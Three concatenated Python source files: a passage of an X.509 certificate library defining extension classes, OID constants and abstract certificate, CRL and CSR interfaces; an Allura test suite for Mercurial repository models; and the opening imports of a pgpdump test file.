            raise TypeError(
                "Every item in the descriptions list must be an "
                "AccessDescription"
            )
        self._descriptions = descriptions

    def __iter__(self):
        return iter(self._descriptions)

    def __len__(self):
        return len(self._descriptions)

    def __eq__(self, other):
        if not isinstance(other, AuthorityInformationAccess):
            return NotImplemented
        return self._descriptions == other._descriptions

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<AuthorityInformationAccess({0})>".format(self._descriptions)
class AccessDescription(object):
    """One entry of authorityInfoAccess: an access method plus a location.

    ``access_method`` must be OID_OCSP or OID_CA_ISSUERS;
    ``access_location`` must implement the GeneralName interface.
    """

    def __init__(self, access_method, access_location):
        if not (access_method == OID_OCSP or access_method == OID_CA_ISSUERS):
            raise ValueError(
                "access_method must be OID_OCSP or OID_CA_ISSUERS"
            )
        if not isinstance(access_location, GeneralName):
            raise TypeError("access_location must be a GeneralName")
        self._access_method = access_method
        self._access_location = access_location

    access_method = utils.read_only_property("_access_method")
    access_location = utils.read_only_property("_access_location")

    def __eq__(self, other):
        if not isinstance(other, AccessDescription):
            return NotImplemented
        return (
            self.access_method == other.access_method and
            self.access_location == other.access_location
        )

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return (
            "<AccessDescription(access_method={0.access_method}, access_locati"
            "on={0.access_location})>".format(self)
        )
class CertificatePolicies(object):
    """certificatePolicies extension value: a list of PolicyInformation."""

    def __init__(self, policies):
        if not all(isinstance(p, PolicyInformation) for p in policies):
            raise TypeError(
                "Every item in the policies list must be a "
                "PolicyInformation"
            )
        self._policies = policies

    def __iter__(self):
        return iter(self._policies)

    def __len__(self):
        return len(self._policies)

    def __eq__(self, other):
        if not isinstance(other, CertificatePolicies):
            return NotImplemented
        return self._policies == other._policies

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<CertificatePolicies({0})>".format(self._policies)
class PolicyInformation(object):
    """One certificate policy: an identifier OID plus optional qualifiers.

    Qualifiers, when given, must each be a text string (a CPS URI) or a
    UserNotice.
    """

    def __init__(self, policy_identifier, policy_qualifiers):
        if not isinstance(policy_identifier, ObjectIdentifier):
            raise TypeError("policy_identifier must be an ObjectIdentifier")
        self._policy_identifier = policy_identifier
        if policy_qualifiers and not all(
            isinstance(q, (six.text_type, UserNotice))
            for q in policy_qualifiers
        ):
            raise TypeError(
                "policy_qualifiers must be a list of strings and/or UserNotice"
                " objects or None"
            )
        self._policy_qualifiers = policy_qualifiers

    policy_identifier = utils.read_only_property("_policy_identifier")
    policy_qualifiers = utils.read_only_property("_policy_qualifiers")

    def __eq__(self, other):
        if not isinstance(other, PolicyInformation):
            return NotImplemented
        return (
            self.policy_identifier == other.policy_identifier and
            self.policy_qualifiers == other.policy_qualifiers
        )

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return (
            "<PolicyInformation(policy_identifier={0.policy_identifier}, polic"
            "y_qualifiers={0.policy_qualifiers})>".format(self)
        )
class UserNotice(object):
    """A userNotice policy qualifier: optional reference plus display text."""

    def __init__(self, notice_reference, explicit_text):
        # A truthy notice_reference must actually be a NoticeReference.
        if notice_reference and not isinstance(
            notice_reference, NoticeReference
        ):
            raise TypeError(
                "notice_reference must be None or a NoticeReference"
            )
        self._notice_reference = notice_reference
        self._explicit_text = explicit_text

    notice_reference = utils.read_only_property("_notice_reference")
    explicit_text = utils.read_only_property("_explicit_text")

    def __eq__(self, other):
        if not isinstance(other, UserNotice):
            return NotImplemented
        return (
            self.notice_reference == other.notice_reference and
            self.explicit_text == other.explicit_text
        )

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return (
            "<UserNotice(notice_reference={0.notice_reference}, explicit_text="
            "{0.explicit_text!r})>".format(self)
        )
class NoticeReference(object):
    """A noticeRef policy qualifier: an organization plus notice numbers.

    :param organization: stored as given (no validation applied).
    :param notice_numbers: must be a list of integers.
    :raises TypeError: if notice_numbers is not a list of integers.
    """

    def __init__(self, organization, notice_numbers):
        self._organization = organization
        # Use six.integer_types rather than bare int so Python 2 ``long``
        # values are accepted — consistent with the integer checks used
        # elsewhere in this module (BasicConstraints, InhibitAnyPolicy).
        if not isinstance(notice_numbers, list) or not all(
            isinstance(x, six.integer_types) for x in notice_numbers
        ):
            raise TypeError(
                "notice_numbers must be a list of integers"
            )
        self._notice_numbers = notice_numbers

    organization = utils.read_only_property("_organization")
    notice_numbers = utils.read_only_property("_notice_numbers")

    def __eq__(self, other):
        if not isinstance(other, NoticeReference):
            return NotImplemented
        return (
            self.organization == other.organization and
            self.notice_numbers == other.notice_numbers
        )

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return (
            "<NoticeReference(organization={0.organization!r}, notice_numbers="
            "{0.notice_numbers})>".format(self)
        )
class SubjectKeyIdentifier(object):
    """subjectKeyIdentifier extension value: an opaque key digest."""

    def __init__(self, digest):
        self._digest = digest

    digest = utils.read_only_property("_digest")

    def __eq__(self, other):
        if not isinstance(other, SubjectKeyIdentifier):
            return NotImplemented
        return self.digest == other.digest

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<SubjectKeyIdentifier(digest={0!r})>".format(self.digest)
class CRLDistributionPoints(object):
    """cRLDistributionPoints extension value: a list of DistributionPoint."""

    def __init__(self, distribution_points):
        if not all(
            isinstance(dp, DistributionPoint) for dp in distribution_points
        ):
            raise TypeError(
                "distribution_points must be a list of DistributionPoint "
                "objects"
            )
        self._distribution_points = distribution_points

    def __iter__(self):
        return iter(self._distribution_points)

    def __len__(self):
        return len(self._distribution_points)

    def __eq__(self, other):
        if not isinstance(other, CRLDistributionPoints):
            return NotImplemented
        return self._distribution_points == other._distribution_points

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<CRLDistributionPoints({0})>".format(self._distribution_points)
class DistributionPoint(object):
    """One entry of cRLDistributionPoints.

    Exactly one of ``full_name`` / ``relative_name`` may be set.  ``reasons``
    is an optional frozenset of ReasonFlags (excluding ``unspecified`` and
    ``remove_from_crl``) and, when set, requires at least one of crl_issuer,
    full_name or relative_name.  The validation order below is part of the
    observable behavior (it determines which error is raised first).
    """
    def __init__(self, full_name, relative_name, reasons, crl_issuer):
        # full_name and relative_name are mutually exclusive.
        if full_name and relative_name:
            raise ValueError(
                "At least one of full_name and relative_name must be None"
            )
        if full_name and not all(
            isinstance(x, GeneralName) for x in full_name
        ):
            raise TypeError(
                "full_name must be a list of GeneralName objects"
            )
        if relative_name and not isinstance(relative_name, Name):
            raise TypeError("relative_name must be a Name")
        if crl_issuer and not all(
            isinstance(x, GeneralName) for x in crl_issuer
        ):
            raise TypeError(
                "crl_issuer must be None or a list of general names"
            )
        # reasons must be a frozenset of ReasonFlags...
        if reasons and (not isinstance(reasons, frozenset) or not all(
            isinstance(x, ReasonFlags) for x in reasons
        )):
            raise TypeError("reasons must be None or frozenset of ReasonFlags")
        # ...and may not contain the two flags that make no sense here.
        if reasons and (
            ReasonFlags.unspecified in reasons or
            ReasonFlags.remove_from_crl in reasons
        ):
            raise ValueError(
                "unspecified and remove_from_crl are not valid reasons in a "
                "DistributionPoint"
            )
        # reasons alone is meaningless: some locator must accompany it.
        if reasons and not crl_issuer and not (full_name or relative_name):
            raise ValueError(
                "You must supply crl_issuer, full_name, or relative_name when "
                "reasons is not None"
            )
        self._full_name = full_name
        self._relative_name = relative_name
        self._reasons = reasons
        self._crl_issuer = crl_issuer
    def __repr__(self):
        return (
            "<DistributionPoint(full_name={0.full_name}, relative_name={0.rela"
            "tive_name}, reasons={0.reasons}, crl_issuer={0.crl_is"
            "suer})>".format(self)
        )
    def __eq__(self, other):
        if not isinstance(other, DistributionPoint):
            return NotImplemented
        return (
            self.full_name == other.full_name and
            self.relative_name == other.relative_name and
            self.reasons == other.reasons and
            self.crl_issuer == other.crl_issuer
        )
    def __ne__(self, other):
        return not self == other
    # Read-only accessors over the validated fields.
    full_name = utils.read_only_property("_full_name")
    relative_name = utils.read_only_property("_relative_name")
    reasons = utils.read_only_property("_reasons")
    crl_issuer = utils.read_only_property("_crl_issuer")
class ReasonFlags(Enum):
    """CRL revocation reason codes; member values are the encoded names."""
    unspecified = "unspecified"
    key_compromise = "keyCompromise"
    ca_compromise = "cACompromise"
    affiliation_changed = "affiliationChanged"
    superseded = "superseded"
    cessation_of_operation = "cessationOfOperation"
    certificate_hold = "certificateHold"
    privilege_withdrawn = "privilegeWithdrawn"
    aa_compromise = "aACompromise"
    remove_from_crl = "removeFromCRL"
class InhibitAnyPolicy(object):
    """inhibitAnyPolicy extension value: number of certificates to skip."""

    def __init__(self, skip_certs):
        if not isinstance(skip_certs, six.integer_types):
            raise TypeError("skip_certs must be an integer")
        if skip_certs < 0:
            raise ValueError("skip_certs must be a non-negative integer")
        self._skip_certs = skip_certs

    skip_certs = utils.read_only_property("_skip_certs")

    def __eq__(self, other):
        if not isinstance(other, InhibitAnyPolicy):
            return NotImplemented
        return self.skip_certs == other.skip_certs

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<InhibitAnyPolicy(skip_certs={0.skip_certs})>".format(self)
@six.add_metaclass(abc.ABCMeta)
class GeneralName(object):
    """Abstract interface implemented by every GeneralName variant below
    (via utils.register_interface)."""
    @abc.abstractproperty
    def value(self):
        """
        Return the value of the object
        """
@utils.register_interface(GeneralName)
class RFC822Name(object):
    """GeneralName holding an e-mail address (rfc822Name)."""

    def __init__(self, value):
        if not isinstance(value, six.text_type):
            raise TypeError("value must be a unicode string")
        self._value = value

    value = utils.read_only_property("_value")

    def __eq__(self, other):
        if not isinstance(other, RFC822Name):
            return NotImplemented
        return self.value == other.value

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<RFC822Name(value={0})>".format(self.value)
@utils.register_interface(GeneralName)
class DNSName(object):
    """GeneralName holding a DNS name (dNSName)."""

    def __init__(self, value):
        if not isinstance(value, six.text_type):
            raise TypeError("value must be a unicode string")
        self._value = value

    value = utils.read_only_property("_value")

    def __eq__(self, other):
        if not isinstance(other, DNSName):
            return NotImplemented
        return self.value == other.value

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<DNSName(value={0})>".format(self.value)
@utils.register_interface(GeneralName)
class UniformResourceIdentifier(object):
    """GeneralName holding a URI (uniformResourceIdentifier)."""

    def __init__(self, value):
        if not isinstance(value, six.text_type):
            raise TypeError("value must be a unicode string")
        self._value = value

    value = utils.read_only_property("_value")

    def __eq__(self, other):
        if not isinstance(other, UniformResourceIdentifier):
            return NotImplemented
        return self.value == other.value

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<UniformResourceIdentifier(value={0})>".format(self.value)
@utils.register_interface(GeneralName)
class DirectoryName(object):
    """GeneralName holding an X.509 Name (directoryName)."""

    def __init__(self, value):
        if not isinstance(value, Name):
            raise TypeError("value must be a Name")
        self._value = value

    value = utils.read_only_property("_value")

    def __eq__(self, other):
        if not isinstance(other, DirectoryName):
            return NotImplemented
        return self.value == other.value

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<DirectoryName(value={0})>".format(self.value)
@utils.register_interface(GeneralName)
class RegisteredID(object):
    """GeneralName holding an ObjectIdentifier (registeredID)."""

    def __init__(self, value):
        if not isinstance(value, ObjectIdentifier):
            raise TypeError("value must be an ObjectIdentifier")
        self._value = value

    value = utils.read_only_property("_value")

    def __eq__(self, other):
        if not isinstance(other, RegisteredID):
            return NotImplemented
        return self.value == other.value

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<RegisteredID(value={0})>".format(self.value)
@utils.register_interface(GeneralName)
class IPAddress(object):
    """GeneralName holding an IP address or network (iPAddress)."""

    def __init__(self, value):
        permitted = (
            ipaddress.IPv4Address,
            ipaddress.IPv6Address,
            ipaddress.IPv4Network,
            ipaddress.IPv6Network,
        )
        if not isinstance(value, permitted):
            raise TypeError(
                "value must be an instance of ipaddress.IPv4Address, "
                "ipaddress.IPv6Address, ipaddress.IPv4Network, or "
                "ipaddress.IPv6Network"
            )
        self._value = value

    value = utils.read_only_property("_value")

    def __eq__(self, other):
        if not isinstance(other, IPAddress):
            return NotImplemented
        return self.value == other.value

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<IPAddress(value={0})>".format(self.value)
class GeneralNames(object):
    """An ordered collection of GeneralName objects."""

    def __init__(self, general_names):
        if not all(isinstance(n, GeneralName) for n in general_names):
            raise TypeError(
                "Every item in the general_names list must be an "
                "object conforming to the GeneralName interface"
            )
        self._general_names = general_names

    def __iter__(self):
        return iter(self._general_names)

    def __len__(self):
        return len(self._general_names)

    def get_values_for_type(self, type):
        """Return the ``value`` of every entry that is an instance of *type*."""
        return [
            name.value
            for name in self._general_names
            if isinstance(name, type)
        ]

    def __eq__(self, other):
        if not isinstance(other, GeneralNames):
            return NotImplemented
        return self._general_names == other._general_names

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<GeneralNames({0})>".format(self._general_names)
class SubjectAlternativeName(object):
    """subjectAltName extension value: wraps a GeneralNames collection."""

    def __init__(self, general_names):
        # Delegate validation and storage to GeneralNames.
        self._general_names = GeneralNames(general_names)

    def __iter__(self):
        return iter(self._general_names)

    def __len__(self):
        return len(self._general_names)

    def get_values_for_type(self, type):
        """Return the ``value`` of every entry that is an instance of *type*."""
        return self._general_names.get_values_for_type(type)

    def __eq__(self, other):
        if not isinstance(other, SubjectAlternativeName):
            return NotImplemented
        return self._general_names == other._general_names

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<SubjectAlternativeName({0})>".format(self._general_names)
class IssuerAlternativeName(object):
    """issuerAltName extension value: wraps a GeneralNames collection."""

    def __init__(self, general_names):
        # Delegate validation and storage to GeneralNames.
        self._general_names = GeneralNames(general_names)

    def __iter__(self):
        return iter(self._general_names)

    def __len__(self):
        return len(self._general_names)

    def get_values_for_type(self, type):
        """Return the ``value`` of every entry that is an instance of *type*."""
        return self._general_names.get_values_for_type(type)

    def __eq__(self, other):
        if not isinstance(other, IssuerAlternativeName):
            return NotImplemented
        return self._general_names == other._general_names

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<IssuerAlternativeName({0})>".format(self._general_names)
class AuthorityKeyIdentifier(object):
    """authorityKeyIdentifier extension value.

    ``authority_cert_issuer`` (a list of GeneralName) and
    ``authority_cert_serial_number`` (an integer) must be supplied together
    or both left None; ``key_identifier`` is stored as given.
    """
    def __init__(self, key_identifier, authority_cert_issuer,
                 authority_cert_serial_number):
        # The issuer/serial pair is all-or-nothing, and only validated
        # when at least one of the two is provided.
        if authority_cert_issuer or authority_cert_serial_number:
            if not authority_cert_issuer or not authority_cert_serial_number:
                raise ValueError(
                    "authority_cert_issuer and authority_cert_serial_number "
                    "must both be present or both None"
                )
            if not all(
                isinstance(x, GeneralName) for x in authority_cert_issuer
            ):
                raise TypeError(
                    "authority_cert_issuer must be a list of GeneralName "
                    "objects"
                )
            if not isinstance(authority_cert_serial_number, six.integer_types):
                raise TypeError(
                    "authority_cert_serial_number must be an integer"
                )
        self._key_identifier = key_identifier
        self._authority_cert_issuer = authority_cert_issuer
        self._authority_cert_serial_number = authority_cert_serial_number
    def __repr__(self):
        return (
            "<AuthorityKeyIdentifier(key_identifier={0.key_identifier!r}, "
            "authority_cert_issuer={0.authority_cert_issuer}, "
            "authority_cert_serial_number={0.authority_cert_serial_number}"
            ")>".format(self)
        )
    def __eq__(self, other):
        if not isinstance(other, AuthorityKeyIdentifier):
            return NotImplemented
        return (
            self.key_identifier == other.key_identifier and
            self.authority_cert_issuer == other.authority_cert_issuer and
            self.authority_cert_serial_number ==
            other.authority_cert_serial_number
        )
    def __ne__(self, other):
        return not self == other
    # Read-only accessors over the validated fields.
    key_identifier = utils.read_only_property("_key_identifier")
    authority_cert_issuer = utils.read_only_property("_authority_cert_issuer")
    authority_cert_serial_number = utils.read_only_property(
        "_authority_cert_serial_number"
    )
# Distinguished-name attribute OIDs followed by signature-algorithm OIDs;
# see _OID_NAMES above for the matching human-readable names.
OID_COMMON_NAME = ObjectIdentifier("2.5.4.3")
OID_COUNTRY_NAME = ObjectIdentifier("2.5.4.6")
OID_LOCALITY_NAME = ObjectIdentifier("2.5.4.7")
OID_STATE_OR_PROVINCE_NAME = ObjectIdentifier("2.5.4.8")
OID_ORGANIZATION_NAME = ObjectIdentifier("2.5.4.10")
OID_ORGANIZATIONAL_UNIT_NAME = ObjectIdentifier("2.5.4.11")
OID_SERIAL_NUMBER = ObjectIdentifier("2.5.4.5")
OID_SURNAME = ObjectIdentifier("2.5.4.4")
OID_GIVEN_NAME = ObjectIdentifier("2.5.4.42")
OID_TITLE = ObjectIdentifier("2.5.4.12")
OID_GENERATION_QUALIFIER = ObjectIdentifier("2.5.4.44")
OID_DN_QUALIFIER = ObjectIdentifier("2.5.4.46")
OID_PSEUDONYM = ObjectIdentifier("2.5.4.65")
OID_DOMAIN_COMPONENT = ObjectIdentifier("0.9.2342.19200300.100.1.25")
OID_EMAIL_ADDRESS = ObjectIdentifier("1.2.840.113549.1.9.1")
OID_RSA_WITH_MD5 = ObjectIdentifier("1.2.840.113549.1.1.4")
OID_RSA_WITH_SHA1 = ObjectIdentifier("1.2.840.113549.1.1.5")
OID_RSA_WITH_SHA224 = ObjectIdentifier("1.2.840.113549.1.1.14")
OID_RSA_WITH_SHA256 = ObjectIdentifier("1.2.840.113549.1.1.11")
OID_RSA_WITH_SHA384 = ObjectIdentifier("1.2.840.113549.1.1.12")
OID_RSA_WITH_SHA512 = ObjectIdentifier("1.2.840.113549.1.1.13")
OID_ECDSA_WITH_SHA224 = ObjectIdentifier("1.2.840.10045.4.3.1")
OID_ECDSA_WITH_SHA256 = ObjectIdentifier("1.2.840.10045.4.3.2")
OID_ECDSA_WITH_SHA384 = ObjectIdentifier("1.2.840.10045.4.3.3")
OID_ECDSA_WITH_SHA512 = ObjectIdentifier("1.2.840.10045.4.3.4")
OID_DSA_WITH_SHA1 = ObjectIdentifier("1.2.840.10040.4.3")
OID_DSA_WITH_SHA224 = ObjectIdentifier("2.16.840.1.101.3.4.3.1")
OID_DSA_WITH_SHA256 = ObjectIdentifier("2.16.840.1.101.3.4.3.2")
# Maps a signature-algorithm OID (dotted string) to the hash algorithm
# instance that algorithm uses; consumers look up signature_hash_algorithm
# values here.
_SIG_OIDS_TO_HASH = {
    OID_RSA_WITH_MD5.dotted_string: hashes.MD5(),
    OID_RSA_WITH_SHA1.dotted_string: hashes.SHA1(),
    OID_RSA_WITH_SHA224.dotted_string: hashes.SHA224(),
    OID_RSA_WITH_SHA256.dotted_string: hashes.SHA256(),
    OID_RSA_WITH_SHA384.dotted_string: hashes.SHA384(),
    OID_RSA_WITH_SHA512.dotted_string: hashes.SHA512(),
    OID_ECDSA_WITH_SHA224.dotted_string: hashes.SHA224(),
    OID_ECDSA_WITH_SHA256.dotted_string: hashes.SHA256(),
    OID_ECDSA_WITH_SHA384.dotted_string: hashes.SHA384(),
    OID_ECDSA_WITH_SHA512.dotted_string: hashes.SHA512(),
    OID_DSA_WITH_SHA1.dotted_string: hashes.SHA1(),
    OID_DSA_WITH_SHA224.dotted_string: hashes.SHA224(),
    OID_DSA_WITH_SHA256.dotted_string: hashes.SHA256()
}
# Extended-key-usage, access-method and policy-qualifier OIDs; OID_OCSP and
# OID_CA_ISSUERS are the valid access methods for AccessDescription above.
OID_SERVER_AUTH = ObjectIdentifier("1.3.6.1.5.5.7.3.1")
OID_CLIENT_AUTH = ObjectIdentifier("1.3.6.1.5.5.7.3.2")
OID_CODE_SIGNING = ObjectIdentifier("1.3.6.1.5.5.7.3.3")
OID_EMAIL_PROTECTION = ObjectIdentifier("1.3.6.1.5.5.7.3.4")
OID_TIME_STAMPING = ObjectIdentifier("1.3.6.1.5.5.7.3.8")
OID_OCSP_SIGNING = ObjectIdentifier("1.3.6.1.5.5.7.3.9")
OID_CA_ISSUERS = ObjectIdentifier("1.3.6.1.5.5.7.48.2")
OID_OCSP = ObjectIdentifier("1.3.6.1.5.5.7.48.1")
OID_CPS_QUALIFIER = ObjectIdentifier("1.3.6.1.5.5.7.2.1")
OID_CPS_USER_NOTICE = ObjectIdentifier("1.3.6.1.5.5.7.2.2")
OID_ANY_POLICY = ObjectIdentifier("2.5.29.32.0")
@six.add_metaclass(abc.ABCMeta)
class Certificate(object):
    """Abstract interface an X.509 certificate implementation must provide."""
    @abc.abstractmethod
    def fingerprint(self, algorithm):
        """
        Returns bytes using digest passed.
        """
    @abc.abstractproperty
    def serial(self):
        """
        Returns certificate serial number
        """
    @abc.abstractproperty
    def version(self):
        """
        Returns the certificate version
        """
    @abc.abstractmethod
    def public_key(self):
        """
        Returns the public key
        """
    @abc.abstractproperty
    def not_valid_before(self):
        """
        Not before time (represented as UTC datetime)
        """
    @abc.abstractproperty
    def not_valid_after(self):
        """
        Not after time (represented as UTC datetime)
        """
    @abc.abstractproperty
    def issuer(self):
        """
        Returns the issuer name object.
        """
    @abc.abstractproperty
    def subject(self):
        """
        Returns the subject name object.
        """
    @abc.abstractproperty
    def signature_hash_algorithm(self):
        """
        Returns a HashAlgorithm corresponding to the type of the digest signed
        in the certificate.
        """
    @abc.abstractproperty
    def extensions(self):
        """
        Returns an Extensions object.
        """
    @abc.abstractmethod
    def __eq__(self, other):
        """
        Checks equality.
        """
    @abc.abstractmethod
    def __ne__(self, other):
        """
        Checks not equal.
        """
    @abc.abstractmethod
    def public_bytes(self, encoding):
        """
        Serializes the certificate to PEM or DER format.
        """
@six.add_metaclass(abc.ABCMeta)
class CertificateRevocationList(object):
    """Abstract interface for an X.509 certificate revocation list (CRL)."""

    @abc.abstractmethod
    def fingerprint(self, algorithm):
        """
        Returns bytes using digest passed.
        """

    @abc.abstractproperty
    def signature_hash_algorithm(self):
        """
        Returns a HashAlgorithm corresponding to the type of the digest signed
        in the certificate.
        """

    @abc.abstractproperty
    def issuer(self):
        """
        Returns the X509Name with the issuer of this CRL.
        """

    @abc.abstractproperty
    def next_update(self):
        """
        Returns the date of next update for this CRL.
        """

    @abc.abstractproperty
    def last_update(self):
        """
        Returns the date of last update for this CRL.
        """

    @abc.abstractproperty
    def revoked_certificates(self):
        """
        Returns a list of RevokedCertificate objects for this CRL.
        """

    @abc.abstractproperty
    def extensions(self):
        """
        Returns an Extensions object containing a list of CRL extensions.
        """

    @abc.abstractmethod
    def __eq__(self, other):
        """
        Checks equality.
        """

    @abc.abstractmethod
    def __ne__(self, other):
        """
        Checks not equal.
        """
@six.add_metaclass(abc.ABCMeta)
class CertificateSigningRequest(object):
    """Abstract interface for an X.509 certificate signing request (CSR)."""

    @abc.abstractmethod
    def public_key(self):
        """
        Returns the public key
        """

    @abc.abstractproperty
    def subject(self):
        """
        Returns the subject name object.
        """

    @abc.abstractproperty
    def signature_hash_algorithm(self):
        """
        Returns a HashAlgorithm corresponding to the type of the digest signed
        in the certificate.
        """

    @abc.abstractproperty
    def extensions(self):
        """
        Returns the extensions in the signing request.
        """

    @abc.abstractmethod
    def public_bytes(self, encoding):
        """
        Encodes the request to PEM or DER format.
        """
@six.add_metaclass(abc.ABCMeta)
class RevokedCertificate(object):
    """Abstract interface for a single revoked-certificate entry of a CRL."""

    @abc.abstractproperty
    def serial_number(self):
        """
        Returns the serial number of the revoked certificate.
        """

    @abc.abstractproperty
    def revocation_date(self):
        """
        Returns the date of when this certificate was revoked.
        """

    @abc.abstractproperty
    def extensions(self):
        """
        Returns an Extensions object containing a list of Revoked extensions.
        """
|
|
import os
import shutil
import unittest
import pkg_resources
import mock
from ming.base import Object
from ming.orm import ThreadLocalORMSession
from alluratest.controller import setup_basic_test, setup_global_objects
from allura.lib import helpers as h
from allura.tests import decorators as td
from allura.tests.model.test_repo import RepoImplTestBase
from allura import model as M
from forgehg import model as HM
class TestNewRepo(unittest.TestCase):
    """Smoke tests for a freshly refreshed hg repository model."""

    def setUp(self):
        setup_basic_test()
        self.setup_with_tools()

    @td.with_hg
    def setup_with_tools(self):
        """Create the hg tool context and cache the head commit."""
        setup_global_objects()
        h.set_context('test', 'src-hg', neighborhood='Projects')
        repo_dir = pkg_resources.resource_filename(
            'forgehg', 'tests/data')
        self.repo = HM.Repository(
            name='testrepo.hg',
            fs_path=repo_dir,
            url_path='/test/',
            tool='hg',
            status='creating')
        self.repo.refresh()
        self.rev = M.repo.Commit.query.get(_id=self.repo.heads[0]['object_id'])
        self.rev.repo = self.repo
        ThreadLocalORMSession.flush_all()
        ThreadLocalORMSession.close_all()

    def test_redo_trees(self):
        """Removing cached tree docs and re-reading must rebuild equal data."""
        old_tree = self.rev.tree
        del self.rev.tree
        M.repo.Tree.query.remove()
        ThreadLocalORMSession.close_all()
        new_tree = self.rev.tree
        self.assertEqual(old_tree.tree_ids, new_tree.tree_ids)
        self.assertEqual(old_tree.blob_ids, new_tree.blob_ids)
        self.assertEqual(old_tree._id, new_tree._id)

    def test_commit(self):
        """Exercise the commit model API of the fixture repository head."""
        assert self.rev.primary() is self.rev
        assert self.rev.index_id().startswith('allura/model/repo/Commit#')
        # exercise the lazy URL properties; no return value to check here
        self.rev.author_url
        self.rev.committer_url
        assert self.rev.tree._id == self.rev.tree_id
        assert self.rev.summary == self.rev.message.splitlines()[0]
        assert self.rev.shorthand_id() == '[5a0a99]'
        assert self.rev.symbolic_ids == (['default'], ['tip'])
        assert self.rev.url() == (
            '/p/test/src-hg/ci/'
            '5a0a993efa9bce7d1983344261393e841fcfd65d/')
        all_cis = self.rev.log(0, 1000)
        assert len(all_cis) == 6
        # log() slices must agree with the full history listing
        assert self.rev.log(1, 1000) == all_cis[1:]
        assert self.rev.log(0, 3) == all_cis[:3]
        assert self.rev.log(1, 2) == all_cis[1:3]
        for ci in all_cis:
            ci.count_revisions()
            ci.context()
        self.rev.tree.ls()
        assert self.rev.tree.readme() == (
            'README', 'This is readme\nAnother line\n')
        assert self.rev.tree.path() == '/'
        assert self.rev.tree.url() == (
            '/p/test/src-hg/ci/'
            '5a0a993efa9bce7d1983344261393e841fcfd65d/'
            'tree/')
        self.rev.tree.by_name['README']
        # truthiness check instead of the `== True` anti-idiom
        assert self.rev.tree.is_blob('README')
class TestHgRepo(unittest.TestCase, RepoImplTestBase):
    """Repository-level tests for the hg backend implementation."""

    def setUp(self):
        setup_basic_test()
        self.setup_with_tools()

    @td.with_hg
    def setup_with_tools(self):
        """Create the hg tool context and refresh the fixture repository."""
        setup_global_objects()
        h.set_context('test', 'src-hg', neighborhood='Projects')
        repo_dir = pkg_resources.resource_filename(
            'forgehg', 'tests/data')
        self.repo = HM.Repository(
            name='testrepo.hg',
            fs_path=repo_dir,
            url_path='/test/',
            tool='hg',
            status='creating')
        self.repo.refresh()
        ThreadLocalORMSession.flush_all()
        ThreadLocalORMSession.close_all()

    def _scratch_repo(self):
        """Build a throwaway repo model under /tmp, removing any stale copy.

        Returns (repo, dirname) where dirname is the on-disk location the
        caller is responsible for cleaning up.
        """
        repo = HM.Repository(
            name='testrepo.hg',
            fs_path='/tmp/',
            url_path='/test/',
            tool='hg',
            status='creating')
        dirname = os.path.join(repo.fs_path, repo.name)
        if os.path.exists(dirname):
            shutil.rmtree(dirname)
        return repo, dirname

    def test_init(self):
        repo, dirname = self._scratch_repo()
        repo.init()
        shutil.rmtree(dirname)

    def test_clone(self):
        repo, dirname = self._scratch_repo()
        repo_path = pkg_resources.resource_filename(
            'forgehg', 'tests/data/testrepo.hg')
        repo.init()
        repo._impl.clone_from(repo_path)
        assert len(repo.log())
        shutil.rmtree(dirname)

    def test_index(self):
        i = self.repo.index()
        assert i['type_s'] == 'Hg Repository', i

    def test_log(self):
        for entry in self.repo.log():
            # skip the synthetic null revision
            if entry._id.startswith('00000000'):
                continue
            assert entry.committed.email == 'rick446@usa.net'
            assert entry.message

    def test_revision(self):
        entry = self.repo.commit('tip')
        assert entry.committed.email == 'rick446@usa.net'
        assert entry.message
        # Test that sha1s for named refs are looked up in cache first, instead
        # of from disk.
        with mock.patch('forgehg.model.hg.M.repo.Commit.query') as q:
            self.repo.heads.append(Object(name='HEAD', object_id='deadbeef'))
            self.repo.commit('HEAD')
            q.get.assert_called_with(_id='deadbeef')
class TestHgCommit(unittest.TestCase):
    """Commit-level tests against the 'tip' commit of the fixture repo."""

    def setUp(self):
        setup_basic_test()
        self.setup_with_tools()

    @td.with_hg
    def setup_with_tools(self):
        # Build the tool context, refresh the fixture repo and keep 'tip'.
        setup_global_objects()
        h.set_context('test', 'src-hg', neighborhood='Projects')
        repo_dir = pkg_resources.resource_filename(
            'forgehg', 'tests/data')
        self.repo = HM.Repository(
            name='testrepo.hg',
            fs_path=repo_dir,
            url_path = '/test/',
            tool = 'hg',
            status = 'creating')
        self.repo.refresh()
        self.rev = self.repo.commit('tip')
        ThreadLocalORMSession.flush_all()
        ThreadLocalORMSession.close_all()

    def test_redo_trees(self):
        # Removing the cached tree docs and re-reading must rebuild equal data.
        old_tree = self.rev.tree
        del self.rev.tree
        M.repo.Tree.query.remove(dict(type='tree'))
        ThreadLocalORMSession.close_all()
        new_tree = self.rev.tree
        self.assertEqual(old_tree.tree_ids, new_tree.tree_ids)
        self.assertEqual(old_tree.blob_ids, new_tree.blob_ids)
        self.assertEqual(old_tree._id, new_tree._id)

    def test_url(self):
        assert self.rev.url().endswith('cfd65d/'), \
            self.rev.url()

    def test_committer_url(self):
        assert self.rev.committer_url is None

    def test_primary(self):
        assert self.rev.primary() == self.rev

    def test_shorthand(self):
        assert len(self.rev.shorthand_id()) == 8

    def test_diff(self):
        # Exercise diff computation across all change categories; the
        # output is printed for debugging only (Python 2 print statement).
        diffs = (self.rev.diffs.added
                 +self.rev.diffs.removed
                 +self.rev.diffs.changed
                 +self.rev.diffs.copied)
        for d in diffs:
            print d
|
|
import base64
from datetime import datetime
from itertools import repeat
import os.path
from unittest import main, TestCase
from pgpdump import AsciiData, BinaryData
